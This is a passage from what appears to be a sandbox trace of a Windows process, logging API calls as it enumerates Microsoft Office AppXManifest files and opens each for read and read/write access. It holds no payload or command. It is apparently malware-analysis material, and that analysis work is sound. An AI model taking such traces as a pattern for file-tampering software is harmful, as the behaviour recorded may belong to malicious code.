office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.126] GetFileType (hFile=0x368) returned 0x1 [0099.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.126] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.126] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.126] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.126] CloseHandle (hObject=0x368) returned 1 [0099.128] AreFileApisANSI () returned 1 [0099.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 105 [0099.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.129] GetFileType (hFile=0x368) returned 0x1 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.129] CloseHandle (hObject=0x368) returned 1 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0099.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.130] AreFileApisANSI () returned 1 [0099.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 105 [0099.130] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x839bc0c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x839bc0c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2400)) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.130] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x838fd5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x838fd5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP4637~1.XML")) returned 1 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f90 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f90 | out: hHeap=0x20000) returned 1 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cd88 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89640 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89388 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89640 | out: hHeap=0x20000) returned 1 [0099.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89388 | out: hHeap=0x20000) returned 1 [0099.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.131] AreFileApisANSI () returned 1 [0099.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0099.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.132] AreFileApisANSI () returned 1 [0099.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 105 [0099.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.132] GetFileType (hFile=0x368) returned 0x1 [0099.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.132] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.132] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.133] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.133] CloseHandle (hObject=0x368) returned 1 [0099.133] AreFileApisANSI () returned 1 [0099.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 105 [0099.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.133] GetFileType (hFile=0x368) returned 0x1 [0099.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.133] CloseHandle (hObject=0x368) returned 1 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.135] AreFileApisANSI () returned 1 [0099.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 105 [0099.135] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x838fd5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x838fd5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.135] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.135] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.135] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x618a8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP2FE2~1.XML")) returned 1 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693a0 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693a0 | out: hHeap=0x20000) returned 1 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cc38 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 